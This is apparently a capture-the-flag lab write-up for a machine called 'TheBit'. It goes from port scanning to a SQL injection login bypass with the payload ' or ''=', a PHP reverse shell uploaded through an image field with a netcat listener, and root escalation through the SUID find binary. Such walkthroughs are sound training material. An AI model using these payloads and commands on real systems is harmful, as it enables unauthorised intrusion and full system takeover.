TheBit

ip = 10.150.150.146
os = linux

nmap scan

from the nmap scan we can see we have 5 open ports so let’s start enumeration from port 80 and going over to the webpage gives this

i came across a login page on clicking the get started button.

so, trying default creds didn’t work and since the server is running mysql let’s give SQLI a trial using the auth bypass payload as username and password (tho the vulnerable part is the password field so u can enter anything as username while use the payload as passwd)

' or ''='

gave me admin access

Then we found the FLAG3 in the dashboard

so, let’s try to upload a reverse shell

so, go to the test bank page and click on add question then upload a php reverse shell in the image field and save.

We’ve set our netcat listener to listen for reverse connection then click on test bank again that should spawn you a shell. Stabilizing the shell using python -c "import pty;pty.spawn('/bin/bash')" hit enter then export TERM=xterm And ctrl+z then stty raw -echo;fg

BOOM!

we are in

so let’s check for the user flag

privilege escalation

Enumerating the binaries having suid permission using the command

find / -perm -u=s -type f 2>/dev/null

As we can see the find binary has suid permission set on it. so, let’s take the advantage for escalating our privilege to root To do so, let’s use the find command on gtfobins

find . -exec /bin/sh -p \; -quit

And we are root

Thanks.